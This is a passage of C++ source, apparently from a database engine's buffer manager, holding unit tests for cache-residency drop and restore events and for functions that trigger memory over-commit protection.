// BFIReportCacheStatisticsChanges( pstatsBFCacheResidency, ftNow, cbfCacheResidentCurrent, cbfCacheCurrent );
BFCacheStatsChanges statsBFCacheResidency;
// Validate we need more than a 20% total drop from the cache size to trigger the event ...
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 81000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 80000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 79000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusDrop );
CHECK( statsBFCacheResidency.csecLastEventDelta == 0 );
// Move it back up a bit, should event because resident cache >= 85%
CHECK( statsBFCacheResidency.cbfResidentLast == 79000 );
CHECK( statsBFCacheResidency.cbfCacheLast == 100000 );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 200000000LL, 85000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusRestore );
CHECK( statsBFCacheResidency.csecLastEventDelta == 10 );
// Move the resident size up by 10%, should not event because we are already above the normal threshold
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 200000000LL, 95000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// And move it back down, should event cache drop
CHECK( statsBFCacheResidency.cbfResidentLast == 85000 );
CHECK( statsBFCacheResidency.cbfCacheLast == 100000 );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 300000000LL, 79000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusDrop );
CHECK( statsBFCacheResidency.csecLastEventDelta == 10 );
// And move it back up a bit, should not event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 300000000LL, 82000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// And move it back up a bit, should not event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 300000000LL, 84000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// And move it back up a bit, should event because resident cache >= 85%
CHECK( statsBFCacheResidency.cbfResidentLast == 79000 );
CHECK( statsBFCacheResidency.cbfCacheLast == 100000 );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 400000000LL, 85000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusRestore );
CHECK( statsBFCacheResidency.csecLastEventDelta == 10 );
// And move it down, should event drop
CHECK( statsBFCacheResidency.cbfResidentLast == 85000 );
CHECK( statsBFCacheResidency.cbfCacheLast == 100000 );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 500000000LL, 74000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusDrop );
CHECK( statsBFCacheResidency.csecLastEventDelta == 10 );
}
JETUNITTEST( BF, BFICacheUpdateStatisticsIReportStatsShrinkingOk )
{
// BFIReportCacheStatisticsChanges( pstatsBFCacheResidency, ftNow, cbfCacheResidentCurrent, cbfCacheCurrent );
BFCacheStatsChanges statsBFCacheResidency;
// Reset to a full cache
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 100000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// A shrinking cache should not event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 91000, 91000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 86000, 86200 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 50000, 50000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Now a real loss, should fire an event
CHECK( statsBFCacheResidency.cbfResidentLast == 100000 );
CHECK( statsBFCacheResidency.cbfCacheLast == 100000 );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 200000000LL, 35000, 50000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusDrop );
CHECK( statsBFCacheResidency.csecLastEventDelta == 10 );
}
JETUNITTEST( BF, BFICacheUpdateStatisticsIReportStatsHittingZeroLogsOnce )
{
// BFIReportCacheStatisticsChanges( pstatsBFCacheResidency, ftNow, cbfCacheResidentCurrent, cbfCacheCurrent );
BFCacheStatsChanges statsBFCacheResidency;
// Reset to a full cache
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 100000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// A shrinking cache should not event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 50000, 50000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Now a real loss, should fire an event
CHECK( statsBFCacheResidency.cbfResidentLast == 100000 );
CHECK( statsBFCacheResidency.cbfCacheLast == 100000 );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 200000000LL, 0, 50000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusDrop );
CHECK( statsBFCacheResidency.csecLastEventDelta == 10 );
// But re-doing with this cache size should not event again ...
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 200000000LL, 0, 50000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
}
JETUNITTEST( BF, BFICacheUpdateStatisticsIReportStatsSevereResidencyLossEvents )
{
// BFIReportCacheStatisticsChanges( pstatsBFCacheResidency, ftNow, cbfCacheResidentCurrent, cbfCacheCurrent );
BFCacheStatsChanges statsBFCacheResidency;
// Reset to a full cache
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 2300000, 2300000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 2300000, 2300000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 2300000, 2300000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// A severe loss should cause an issue
CHECK( statsBFCacheResidency.cbfResidentLast == 2300000 );
CHECK( statsBFCacheResidency.cbfCacheLast == 2300000 );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 200000000LL, 1100000 /* < 50% resident */, 2300000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusDrop );
CHECK( statsBFCacheResidency.csecLastEventDelta == 10 );
}
JETUNITTEST( BF, BFICacheUpdateStatisticsIReportStatsSevereResidencyLossCoincidentWithCacheShrink )
{
// BFIReportCacheStatisticsChanges( pstatsBFCacheResidency, ftNow, cbfCacheResidentCurrent, cbfCacheCurrent );
BFCacheStatsChanges statsBFCacheResidency;
// Reset to a full cache
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 2300000, 2300000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 2300000, 2300000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 2300000, 2300000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// A severe loss should cause an issue
CHECK( statsBFCacheResidency.cbfResidentLast == 2300000 );
CHECK( statsBFCacheResidency.cbfCacheLast == 2300000 );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 200000000LL, 1100000 /* < 50% resident */, 1500000 /* 1/3rd shrink */ );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusDrop );
CHECK( statsBFCacheResidency.csecLastEventDelta == 10 );
}
JETUNITTEST( BF, BFICacheUpdateStatisticsIReportStatsResidencyLossByGrowth )
{
// BFIReportCacheStatisticsChanges( pstatsBFCacheResidency, ftNow, cbfCacheResidentCurrent, cbfCacheCurrent );
BFCacheStatsChanges statsBFCacheResidency;
// Reset to a full cache
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 100000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Keep absolute residency, decrease percentage (100% -> 66%)
CHECK( statsBFCacheResidency.cbfResidentLast == 100000 );
CHECK( statsBFCacheResidency.cbfCacheLast == 100000 );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 200000000LL, 100000, 150000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusDrop );
CHECK( statsBFCacheResidency.csecLastEventDelta == 10 );
// Keep absolute residency, decrease percentage (66% -> 40%); drop stays within the 30% threshold, no event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 200000000LL, 100000, 250000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Keep absolute residency, decrease percentage (40% -> 35%)
CHECK( statsBFCacheResidency.cbfResidentLast == 100000 );
CHECK( statsBFCacheResidency.cbfCacheLast == 150000 );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 300000000LL, 100000, 285714 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusDrop );
CHECK( statsBFCacheResidency.csecLastEventDelta == 10 );
}
JETUNITTEST( BF, BFICacheUpdateStatisticsIReportStatsResidencyIncreaseByShrinkage )
{
// BFIReportCacheStatisticsChanges( pstatsBFCacheResidency, ftNow, cbfCacheResidentCurrent, cbfCacheCurrent );
BFCacheStatsChanges statsBFCacheResidency;
// 50% residency.
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 100000, 200000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusDrop );
CHECK( statsBFCacheResidency.csecLastEventDelta == 0 );
// Keep absolute residency, increase percentage (50% -> 55%)
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 100000, 181000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Keep absolute residency, increase percentage (55% -> 84%)
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 100000, 119047 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Keep absolute residency, increase percentage (84% -> 85%)
CHECK( statsBFCacheResidency.cbfResidentLast == 100000 );
CHECK( statsBFCacheResidency.cbfCacheLast == 200000 );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 200000000LL, 100000, 117000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusRestore );
CHECK( statsBFCacheResidency.csecLastEventDelta == 10 );
// Keep absolute residency, increase percentage (85% -> 100%), no double restore event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 200000000LL, 100000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
}
JETUNITTEST( BF, BFICacheUpdateStatisticsIReportStatsResidencyLossAndRestoredWithShrink )
{
// BFIReportCacheStatisticsChanges( pstatsBFCacheResidency, ftNow, cbfCacheResidentCurrent, cbfCacheCurrent );
BFCacheStatsChanges statsBFCacheResidency;
// Reset to a full cache
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 100000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Shrink with cache residency loss
CHECK( statsBFCacheResidency.cbfResidentLast == 100000 );
CHECK( statsBFCacheResidency.cbfCacheLast == 100000 );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 200000000LL, 50000, 75000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusDrop );
CHECK( statsBFCacheResidency.csecLastEventDelta == 10 );
// Shrink with cache residency loss, but increased residency percentage
CHECK( statsBFCacheResidency.cbfResidentLast == 50000 );
CHECK( statsBFCacheResidency.cbfCacheLast == 75000 );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 300000000LL, 45000, 50000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusRestore );
CHECK( statsBFCacheResidency.csecLastEventDelta == 10 );
}
JETUNITTEST( BF, BFICacheUpdateStatisticsIReportStatsResidencyIncreaseMultiple )
{
// BFIReportCacheStatisticsChanges( pstatsBFCacheResidency, ftNow, cbfCacheResidentCurrent, cbfCacheCurrent );
BFCacheStatsChanges statsBFCacheResidency;
// Reset to a full cache
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 100000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Reduce residency to 80%, no event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 100000000LL, 80000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Reduce residency to 79%, red event
CHECK( statsBFCacheResidency.cbfResidentLast == 100000 );
CHECK( statsBFCacheResidency.cbfCacheLast == 100000 );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 200000000LL, 79000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusDrop );
CHECK( statsBFCacheResidency.csecLastEventDelta == 10 );
// Reduce residency to 70%, no event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 200000000LL, 70000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Reduce residency to 68%, no event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 200000000LL, 68000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Reduce residency to 49%, no event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 200000000LL, 49000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Reduce residency to 48%, red event
CHECK( statsBFCacheResidency.cbfResidentLast == 79000 );
CHECK( statsBFCacheResidency.cbfCacheLast == 100000 );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 300000000LL, 48000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusDrop );
CHECK( statsBFCacheResidency.csecLastEventDelta == 10 );
// Reduce residency to 38%, no event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 300000000LL, 38000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Reduce residency to 28%, no event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 300000000LL, 28000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Reduce residency to 18%, no event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 300000000LL, 18000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Reduce residency to 17%, red event
CHECK( statsBFCacheResidency.cbfResidentLast == 48000 );
CHECK( statsBFCacheResidency.cbfCacheLast == 100000 );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 400000000LL, 17000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusDrop );
CHECK( statsBFCacheResidency.csecLastEventDelta == 10 );
// Reduce residency to 0%, no event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 400000000LL, 0, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Increase residency to 60%, no event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 400000000LL, 60000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Increase residency to 80%, no event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 400000000LL, 80000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Increase residency to 84%, no event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 400000000LL, 84000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Increase residency to 85%, green event, above normal threshold
CHECK( statsBFCacheResidency.cbfResidentLast == 17000 );
CHECK( statsBFCacheResidency.cbfCacheLast == 100000 );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 500000000LL, 85000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusRestore );
CHECK( statsBFCacheResidency.csecLastEventDelta == 10 );
// Increase residency to 100%, no event because we are already above threshold
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 500000000LL, 100000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Reduce residency to 80%, no event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 500000000LL, 80000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Reduce residency to 79%, red event
CHECK( statsBFCacheResidency.cbfResidentLast == 85000 );
CHECK( statsBFCacheResidency.cbfCacheLast == 100000 );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 600000000LL, 79000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusDrop );
CHECK( statsBFCacheResidency.csecLastEventDelta == 10 );
// Increase residency to 84%, no event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 600000000LL, 84000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Reduce residency to 49%, no event (last was at 79%)
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 600000000LL, 49000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Reduce residency to 48%, red event
CHECK( statsBFCacheResidency.cbfResidentLast == 79000 );
CHECK( statsBFCacheResidency.cbfCacheLast == 100000 );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 700000000LL, 48000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusDrop );
CHECK( statsBFCacheResidency.csecLastEventDelta == 10 );
// Increase residency to 85%, green event, above normal threshold
CHECK( statsBFCacheResidency.cbfResidentLast == 48000 );
CHECK( statsBFCacheResidency.cbfCacheLast == 100000 );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 800000000LL, 85000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusRestore );
CHECK( statsBFCacheResidency.csecLastEventDelta == 10 );
// Reduce residency to 84%, no event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 800000000LL, 84000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Increase residency to 100%, no event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 800000000LL, 100000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Reduce residency to 80%, no event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 800000000LL, 80000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Increase residency to 100%, no event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 800000000LL, 100000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Reduce residency to 79%, red event
CHECK( statsBFCacheResidency.cbfResidentLast == 85000 );
CHECK( statsBFCacheResidency.cbfCacheLast == 100000 );
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 900000000LL, 79000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusDrop );
CHECK( statsBFCacheResidency.csecLastEventDelta == 10 );
// Increase residency to 84%, no event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 900000000LL, 84000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Reduce residency to 79%, no event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 900000000LL, 79000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
// Increase residency to 84%, no event
BFIReportCacheStatisticsChanges( &statsBFCacheResidency, 900000000LL, 84000, 100000 );
CHECK( statsBFCacheResidency.eResidentCurrentEventType == eResidentCacheStatusNoChange );
}
static QWORD g_qwUnintendedResidentPagesLastPass = 0;
static QWORD g_cbfUnintendedResidentPagesLastPass = 0;
static QWORD g_cbfHighUnintendedResidentPagesLastPass = 0;
static QWORD g_qwUnintendedResidentPagesEver = 0;
static TICK g_tickLastUpdateStatistics = 0;
// determines if memory in-depth protection should terminate the process.
BOOL FBFITriggerCacheOverMemoryInDepthProtection(
const __int64 cbTotalPhysicalMemory,
const __int64 cbCommittedCacheSize )
{
//
// implement over-commit defense.
// how it works:
// o trigger protection if our committed cache size is >= pctCommitDefenseRAM % of RAM.
Expected( cbTotalPhysicalMemory > 0 );
Expected( cbCommittedCacheSize >= 0 );
const BOOL fOverCommitRAM = ( cbTotalPhysicalMemory == 0 ) || ( 100 * cbCommittedCacheSize / cbTotalPhysicalMemory >= pctCommitDefenseRAM );
return fOverCommitRAM;
}
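// Rough illustration (assumed numbers): with 32 GB of physical RAM and a hypothetical
// pctCommitDefenseRAM of 100, any committed cache size of 32 GB or more would trip the defense;
// the unit test below derives its "over" size the same way, as
// cbTotalPhysicalMemory * pctCommitDefenseRAM / 100.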
#ifdef ENABLE_JET_UNIT_TEST
JETUNITTEST( BF, TestFBFITriggerCacheOverMemoryInDepthProtection )
{
const __int64 cbTotalPhysicalMemory = 32000000000i64;
const __int64 cbCommittedCacheSizeOver = cbTotalPhysicalMemory * ( pctCommitDefenseRAM ) / 100;
const __int64 cbCommittedCacheSizeOk = cbCommittedCacheSizeOver - 1;
// self-check.
CHECK( cbTotalPhysicalMemory <= cbCommittedCacheSizeOver );
CHECK( cbCommittedCacheSizeOk < cbCommittedCacheSizeOver );
// only two simple cases.
CHECK( !FBFITriggerCacheOverMemoryInDepthProtection( cbTotalPhysicalMemory, cbCommittedCacheSizeOk ) );
CHECK( FBFITriggerCacheOverMemoryInDepthProtection( cbTotalPhysicalMemory, cbCommittedCacheSizeOver ) );
}
#endif // ENABLE_JET_UNIT_TEST
BOOL FBFICommittedCacheSizeOverTargetDefense(
const __int64 cbCommittedCacheSize,
const __int64 cbCommitCacheTarget )
{
Expected( cbCommittedCacheSize >= 0 );
Expected( cbCommitCacheTarget >= 0 );
C_ASSERT( cbCommitDefenseMin > 0 );
// zero is special because it means the buffer manager is shutting down, so in that case
// never consider it to be over-committed.
if ( cbCommitCacheTarget <= 0 )
{
Assert( cbCommitCacheTarget == 0 ); // had better not be negative
return fFalse;
}
// we don't want to be too aggressive for small targets, because even a modest amount of committed
// memory can look too large relative to a small target, so give ourselves some extra room before
// we deem it over-committed, by max'ing in cbCommitDefenseMin.
const __int64 cbCommitCacheTargetT = max( cbCommitCacheTarget, cbCommitDefenseMin );
const BOOL fOverCommitTarget = ( 100 * cbCommittedCacheSize / cbCommitCacheTargetT >= pctCommitDefenseTarget );
return fOverCommitTarget;
}
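// Rough illustration (assumed numbers): if the commit target were smaller than cbCommitDefenseMin,
// the max() above substitutes the floor, so a small target is judged against
// cbCommitDefenseMin * pctCommitDefenseTarget / 100 rather than against itself; the "small target"
// cases in the unit test below exercise exactly this path.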
#ifdef ENABLE_JET_UNIT_TEST
JETUNITTEST( BF, TestFBFICommittedCacheSizeOverTargetDefense )
{
const __int64 cbCommitCacheTargetNominal = cbCommitDefenseMin;
const __int64 cbCommitCacheTargetSmall = cbCommitCacheTargetNominal / 2;
const __int64 cbCommittedCacheSizeOver = cbCommitCacheTargetNominal * pctCommitDefenseTarget / 100;
const __int64 cbCommittedCacheSizeOk = cbCommittedCacheSizeOver - 1;
// self-check.
CHECK( cbCommitCacheTargetSmall < cbCommitCacheTargetNominal );
CHECK( cbCommitCacheTargetNominal < cbCommittedCacheSizeOver );
CHECK( cbCommittedCacheSizeOk < cbCommittedCacheSizeOver );
CHECK( ( 100 * cbCommittedCacheSizeOk / cbCommitCacheTargetSmall ) > pctCommitDefenseTarget );
// nominal target
CHECK( !FBFICommittedCacheSizeOverTargetDefense( cbCommittedCacheSizeOk, cbCommitCacheTargetNominal ) );
CHECK( FBFICommittedCacheSizeOverTargetDefense( cbCommittedCacheSizeOver, cbCommitCacheTargetNominal ) );
// small target
CHECK( !FBFICommittedCacheSizeOverTargetDefense( cbCommittedCacheSizeOk, cbCommitCacheTargetSmall ) );
CHECK( FBFICommittedCacheSizeOverTargetDefense( cbCommittedCacheSizeOver, cbCommitCacheTargetSmall ) );
// zeroed target is always considered not over target
CHECK( !FBFICommittedCacheSizeOverTargetDefense( cbCommittedCacheSizeOk, 0 ) );
CHECK( !FBFICommittedCacheSizeOverTargetDefense( cbCommittedCacheSizeOver, 0 ) );
// zeroed cache size should never be considered over target
CHECK( !FBFICommittedCacheSizeOverTargetDefense( 0, cbCommitCacheTargetNominal ) );
CHECK( !FBFICommittedCacheSizeOverTargetDefense( 0, cbCommitCacheTargetSmall ) );
CHECK( !FBFICommittedCacheSizeOverTargetDefense( 0, 0 ) );
}
#endif // ENABLE_JET_UNIT_TEST
BOOL FBFITriggerCacheOverTargetInDepthProtection(
const __int64 cbCommittedCacheSize,
const __int64 cbCommitCacheTarget,
const TICK dtickCacheSizeDuration )
{
//
// implement slow-shrink defense.
// how it works:
// o if cache resizing has been running for longer than a certain threshold,
// trigger protection if our committed cache size is >= pctCommitDefenseTarget % of target.
Expected( dtickCacheSizeDuration >= 0 );
const BOOL fOverCommitTarget = FBFICommittedCacheSizeOverTargetDefense( cbCommittedCacheSize, cbCommitCacheTarget );
if ( !fOverCommitTarget )
{
return fFalse;
}
const BOOL fTriggerOverCommmitDefense = ( dtickCacheSizeDuration >= dtickCommitDefenseTarget );
return fTriggerOverCommmitDefense;
}
#ifdef ENABLE_JET_UNIT_TEST
JETUNITTEST( BF, TestFBFITriggerCacheOverTargetInDepthProtection )
{
const __int64 cbCommitCacheTargetNominal = cbCommitDefenseMin;
const __int64 cbCommitCacheTargetSmall = cbCommitCacheTargetNominal / 2;
const __int64 cbCommittedCacheSizeOver = cbCommitCacheTargetNominal * pctCommitDefenseTarget / 100;
const __int64 cbCommittedCacheSizeOk = cbCommittedCacheSizeOver - 1;
const TICK dtickCacheSizeDurationOver = dtickCommitDefenseTarget;
const TICK dtickCacheSizeDurationOk = dtickCacheSizeDurationOver - 1;
// self-check.
CHECK( cbCommitCacheTargetSmall < cbCommitCacheTargetNominal );
CHECK( cbCommitCacheTargetNominal < cbCommittedCacheSizeOver );
CHECK( cbCommittedCacheSizeOk < cbCommittedCacheSizeOver );
CHECK( dtickCacheSizeDurationOk < dtickCacheSizeDurationOver );
CHECK( ( 100 * cbCommittedCacheSizeOk / cbCommitCacheTargetSmall ) > pctCommitDefenseTarget );
// nominal target
CHECK( !FBFITriggerCacheOverTargetInDepthProtection( cbCommittedCacheSizeOk, cbCommitCacheTargetNominal, dtickCacheSizeDurationOk ) );
CHECK( !FBFITriggerCacheOverTargetInDepthProtection( cbCommittedCacheSizeOver, cbCommitCacheTargetNominal, dtickCacheSizeDurationOk ) );
CHECK( !FBFITriggerCacheOverTargetInDepthProtection( cbCommittedCacheSizeOk, cbCommitCacheTargetNominal, dtickCacheSizeDurationOver ) );
CHECK( FBFITriggerCacheOverTargetInDepthProtection( cbCommittedCacheSizeOver, cbCommitCacheTargetNominal, dtickCacheSizeDurationOver ) );
// small target
CHECK( !FBFITriggerCacheOverTargetInDepthProtection( cbCommittedCacheSizeOk, cbCommitCacheTargetSmall, dtickCacheSizeDurationOk ) );
CHECK( !FBFITriggerCacheOverTargetInDepthProtection( cbCommittedCacheSizeOver, cbCommitCacheTargetSmall, dtickCacheSizeDurationOk ) );
CHECK( !FBFITriggerCacheOverTargetInDepthProtection( cbCommittedCacheSizeOk, cbCommitCacheTargetSmall, dtickCacheSizeDurationOver ) );
CHECK( FBFITriggerCacheOverTargetInDepthProtection( cbCommittedCacheSizeOver, cbCommitCacheTargetSmall, dtickCacheSizeDurationOver ) );
// zeroed target is always permitted
CHECK( !FBFITriggerCacheOverTargetInDepthProtection( cbCommittedCacheSizeOk, 0, dtickCacheSizeDurationOk ) );
CHECK( !FBFITriggerCacheOverTargetInDepthProtection( cbCommittedCacheSizeOver, 0, dtickCacheSizeDurationOk ) );
CHECK( !FBFITriggerCacheOverTargetInDepthProtection( cbCommittedCacheSizeOk, 0, dtickCacheSizeDurationOver ) );
CHECK( !FBFITriggerCacheOverTargetInDepthProtection( cbCommittedCacheSizeOver, 0, dtickCacheSizeDurationOver ) );
// zeroed cache size should never trigger protection
CHECK( !FBFITriggerCacheOverTargetInDepthProtection( 0, cbCommitCacheTargetNominal, dtickCacheSizeDurationOver ) );
CHECK( !FBFITriggerCacheOverTargetInDepthProtection( 0, cbCommitCacheTargetSmall, dtickCacheSizeDurationOver ) );
CHECK( !FBFITriggerCacheOverTargetInDepthProtection( 0, 0, dtickCacheSizeDurationOver ) );
}
#endif // ENABLE_JET_UNIT_TEST
